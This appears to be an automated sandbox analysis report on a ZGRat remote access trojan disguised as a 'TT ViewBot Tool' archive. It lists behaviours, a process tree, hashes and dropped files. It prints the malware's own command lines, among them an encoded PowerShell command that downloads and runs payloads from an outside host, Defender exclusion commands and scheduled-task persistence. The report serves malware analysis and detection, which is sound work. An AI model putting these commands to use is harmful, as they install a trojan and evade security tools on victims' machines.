Analysis

  • max time kernel
    133s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    07-05-2024 04:28

General

  • Target

    TT ViewBot Tool.rar

  • Size

    2.5MB

  • MD5

    2d8e0aacc4d03e584d72dab765035fe3

  • SHA1

    9e8873ee30ef69abb762781db025ecee0d6be817

  • SHA256

    0aa3a8f7bd8f94484b0435e72e292744161b0707186f94845b7b6b54ac8f874d

  • SHA512

    366a66c845b7a24da8416a4765f11e511fd8dc526e083190dfa5bc8a874f71d5cb155da72aae01d5173b4136e1ad41afd9a5e8437264c4c5c097442fef3298df

  • SSDEEP

    49152:8lV1gGgvC7f0OoqKFKdoOyO29o4wZzboGJDY8BtKr:moGhocdxyDo9boGi2O

Malware Config

Signatures

  • Detect ZGRat V1 4 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 9 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\TT ViewBot Tool.rar"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\TT ViewBot Tool.rar"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Users\Admin\AppData\Local\Temp\7zOC1A11366\bot_start.exe
        "C:\Users\Admin\AppData\Local\Temp\7zOC1A11366\bot_start.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAeQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBuAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBqAHYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHQAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGoAdABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegB2AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABtAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAZAB1AGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAG0AYQBpAG4ALgBwAHkAJwAsACAAPAAjAHgAaAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwB1AGUAIwA+ACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAHUAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG0AYQBpAG4ALgBwAHkAJwApACkAPAAjAGEAYQBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAawBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGEAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZQB0AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAB4AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB4AHYAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBtAGEAaQBuAC4AcAB5ACcAKQA8ACMAYwB1AGwAIwA+AA=="
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2504
          • C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe
            "C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2520
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ChainReview\vN2WLFOsikyY5Jq7XrHIwXoKGZgWET9I.vbe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1548
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\ChainReview\36Xky7wXbnjE3BIjQdUmzIM.bat" "
                7⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:600
                • C:\ChainReview\tthyperRuntimedhcpSvc.exe
                  "C:\ChainReview/tthyperRuntimedhcpSvc.exe"
                  8⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1008
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\rundll32.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2880
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\csrss.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2468
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\explorer.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2168
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\conhost.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2728
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\WmiPrvSE.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2720
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5u0vhjw7EP.bat"
                    9⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2448
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      10⤵
                        PID:776
                      • C:\Windows\system32\PING.EXE
                        ping -n 10 localhost
                        10⤵
                        • Runs ping.exe
                        PID:2776
                      • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\WmiPrvSE.exe
                        "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\WmiPrvSE.exe"
                        10⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2080
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\7zOC1A11366\main.py
              5⤵
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:2980
              • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
                "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\7zOC1A11366\main.py"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:2480
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:2328
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "rundll32r" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\rundll32.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:864
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "rundll32" /sc ONLOGON /tr "'C:\MSOCache\All Users\rundll32.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:568
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "rundll32r" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\rundll32.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3044
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\csrss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1524
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\csrss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1528
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\csrss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1680
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\explorer.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2372
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\explorer.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2304
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\explorer.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1620
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\conhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2540
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2736
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2568
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1228
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2612
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1416

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ChainReview\36Xky7wXbnjE3BIjQdUmzIM.bat

        Filesize

        91B

        MD5

        6c4e82d40f84cbc9a6fec4a5a981a42d

        SHA1

        b9b43a7e2f9f4ad4767974bf4304a9e2a044fca3

        SHA256

        78d5a5d4618dce787ecc963e5f499af55e8c733b28842311f59d4f385ec42d5b

        SHA512

        262c93cb040935bd1f3b7ef8140e6ac322a9601ebb0004b5da24edea0b268db6b178f1d3c5d62c6e95b717603a3d29a00c56f90c8c3479b98335617e42700842

      • C:\ChainReview\vN2WLFOsikyY5Jq7XrHIwXoKGZgWET9I.vbe

        Filesize

        212B

        MD5

        43e82435c4abdf7a34d3f8ac5c575deb

        SHA1

        6d41a829dc856e7d911e8a95e8a4c7463cf18043

        SHA256

        1a8093c1223cfab24ebb1185ee1e5ac65909caf9ee9d5d6dc600c82a5d040acf

        SHA512

        e05cd9e7d232e452cc337335603864368ec042a7f6e322a4d76eb62ada78fca956a17a93d97c86b859e2114f8b2d6d2a0cb60190b8dad6797a62c31d92e6037f

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        315d3cc311f606da694c963e8da90319

        SHA1

        35ba394298a9d79a8eda090938e6aaaf0bf3a487

        SHA256

        db395e7e81662072a29e612676d6897525d23d7cf664fcfc0190849051ff278e

        SHA512

        ccabef69bb6e2a3c3d4b40c244625e8e45cfa6ae4804be3456a3c8677790d6e751a33d0b9d3a4c099fbc05a119160554b953fa8e4ad15dc1c80b321223a954c4

      • C:\Users\Admin\AppData\Local\Temp\5u0vhjw7EP.bat

        Filesize

        203B

        MD5

        ab9308c2b98475c35de03c9f0152ff77

        SHA1

        3270402430cc8cd5b214f9121bc2979a378544ec

        SHA256

        5362f41ab9a3009f0a55990a776bc98d2bd89ebaf2df59aea9422e318678c4c1

        SHA512

        7acd3add30ea7ec9ec834a31d1e88a5719c9b23ee1c2ca7a438886851ab8a3b6e7d3e0246172b025b2a61bbd89a86207a32a9db2e71fd11d6da7b90fffb8f7e3

      • C:\Users\Admin\AppData\Local\Temp\7zOC1A11366\bot_start.exe

        Filesize

        2.5MB

        MD5

        bf4a8b1ff2f896acac3e7ace357abfca

        SHA1

        c1bd1b3d2959d844f6b4e339f45d3749667df3e1

        SHA256

        e0d1d7c74b52bbd40f5dc85cb9b3ab69ae750d8fc3f5fbd15a98eed616c1ce8e

        SHA512

        fd7082a905540e23a5c5b6fd2717c0255ede2680bef16076f174d417bbeef4694e2fa82a8f9e0407cc160344cc194edd19ab40901b468c1695a1b8773e23e494

      • C:\Users\Admin\AppData\Local\Temp\7zOC1A11366\main.py

        Filesize

        5KB

        MD5

        aa214e7b8696382bdc34b4122f001cfc

        SHA1

        8eb821b861487e9a508f405db163a2c5e12cb3f2

        SHA256

        484efff3a213de2098b2943b80b4520f459bc74b253f78be03c3b6c32a22b747

        SHA512

        806793ba81621fba580fcc51032a381c5625e3c1602ec57ef063bc99bc57e11d10a21cbec4f0099d46736e9b9f26b04f542b994a2ac6ad020fd3f1d083499c68

      • C:\Users\Admin\AppData\Local\Temp\CabA5A4.tmp

        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      • C:\Users\Admin\AppData\Local\Temp\TarA676.tmp

        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\03GADH5MVOJ15VD6EA4L.temp

        Filesize

        7KB

        MD5

        160bf6fa1ca6e0a799a04c3523c517a1

        SHA1

        42e4aed37511b07810294c003f2e017407ba8588

        SHA256

        d13a79431dee98d2d36e5e5bb60ac212e2fe448711fdbca8fd4ca42374b86423

        SHA512

        8db9b0899db9be03531ff0661da60239e170273c97b058b02d94a467a38c1f900f691751a0ad09e50690b165e2db11300f48aaddd2566ff58baccbe95c703fc4

      • \ChainReview\tthyperRuntimedhcpSvc.exe

        Filesize

        2.0MB

        MD5

        4518369532566e624ed62d5715fc072c

        SHA1

        c8a4e4d75a1d3ef9e772b7264d61a4a65c37db33

        SHA256

        ad29e830bbc1cb324af918e800caed762d0d2e5a76cdca70cd3926d06add78f0

        SHA512

        d08d1124262cb10862562cccb7c4c1af0a9cc1c0f298fa8a596d528fb8b8be4804217c648de327f57c360267ab756db35b067f3961d1efd50b409a04a1505ae0

      • \Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe

        Filesize

        2.3MB

        MD5

        ce2e801c8d8413da9fe8f98723aab971

        SHA1

        784e4689c62131f43e4c9cd5883f433b88cf08d6

        SHA256

        79af1d0cd368f54b46320eceb7d9931049daf12207ff5e2226f10d9f8e068ca2

        SHA512

        951e938d6e52a6c2918bb0ad86b85cbc107092b6add73fda1ad6b312d3cc47864809370341b513aacbb4ea77002cb1822e7b8c1ab4429e56f2d32b7b16a4e664

      • memory/1008-130-0x00000000006A0000-0x00000000006AE000-memory.dmp

        Filesize

        56KB

      • memory/1008-132-0x00000000006D0000-0x00000000006EC000-memory.dmp

        Filesize

        112KB

      • memory/1008-136-0x00000000006B0000-0x00000000006BE000-memory.dmp

        Filesize

        56KB

      • memory/1008-138-0x00000000006C0000-0x00000000006CE000-memory.dmp

        Filesize

        56KB

      • memory/1008-140-0x0000000002040000-0x000000000204C000-memory.dmp

        Filesize

        48KB

      • memory/1008-142-0x0000000002050000-0x000000000205E000-memory.dmp

        Filesize

        56KB

      • memory/1008-144-0x0000000002060000-0x000000000206C000-memory.dmp

        Filesize

        48KB

      • memory/1008-134-0x0000000002020000-0x0000000002038000-memory.dmp

        Filesize

        96KB

      • memory/1008-128-0x0000000000290000-0x0000000000496000-memory.dmp

        Filesize

        2.0MB

      • memory/2080-183-0x0000000000F50000-0x0000000001156000-memory.dmp

        Filesize

        2.0MB

      • memory/2468-164-0x0000000001F80000-0x0000000001F88000-memory.dmp

        Filesize

        32KB

      • memory/2468-163-0x000000001B570000-0x000000001B852000-memory.dmp

        Filesize

        2.9MB

      • memory/2716-38-0x0000000000400000-0x0000000000E07000-memory.dmp

        Filesize

        10.0MB

      • memory/2716-35-0x0000000000400000-0x0000000000E07000-memory.dmp

        Filesize

        10.0MB